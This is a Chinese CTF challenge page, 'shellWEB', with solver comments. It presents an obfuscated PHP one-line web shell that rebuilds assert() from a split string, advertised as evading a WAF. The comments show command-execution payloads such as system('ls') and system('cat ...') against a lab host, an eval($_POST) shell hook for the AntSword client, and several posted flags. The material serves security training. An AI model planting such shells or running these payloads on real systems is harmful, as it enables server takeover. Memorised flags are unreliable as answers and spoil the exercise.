shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 4944
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
freestyle 19天前

s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容

回复 0

我是CTF大王 21天前

http://114.67.175.224:16478/?s=system(%27ls%27) http://114.67.175.224:16478/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

我是CTF大王 21天前

http://114.67.175.224:16478/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 1

000ooo 25天前

?s=eval+($_POST['123'])

回复 1

ruien 1月前

答案就在描述里,上传的s参数如果是字符串会被当命令执行

回复 0

112356 1月前

flag{0aa5253236aa8d97368bd753cb3c4cf2}

回复 0

迷茫的三千面 1月前

flag{f790b1679ece8cfe8ce3fc425c30896b}

回复 0

星空 1月前

?s=eval($_POST["cmd"]),再用蚁剑连

回复 0

星空 1月前

?s=eval($_POST["cmd"])

回复 0

15824777912 2月前

flag{11393cf7e26fe81d89dc60b63d3a1f52}

回复 0

WriteUp

image
harry

3 金币

评分(6)

解题动态

我是真滴 攻破了该题 1小时前
海宝宝哈哈 攻破了该题 3小时前
LCY2117 攻破了该题 4小时前
yixcjy 攻破了该题 6小时前
feifeifei1212 攻破了该题 8小时前
17530626785 攻破了该题 10小时前
DURUI 攻破了该题 11小时前
ntyz1919810 攻破了该题 1天前
懒大王念你 攻破了该题 1天前
jqr0630 攻破了该题 1天前
nbufe123 攻破了该题 1天前
dgreawSFD 攻破了该题 2天前
24030111073 攻破了该题 2天前
reaquedaue 攻破了该题 2天前
mffl 攻破了该题 2天前
0x2d3CN 攻破了该题 3天前
1870006529 攻破了该题 3天前
Xlj15562926857 攻破了该题 3天前
z19708684985 攻破了该题 3天前
当心眼睛 攻破了该题 3天前
问题反馈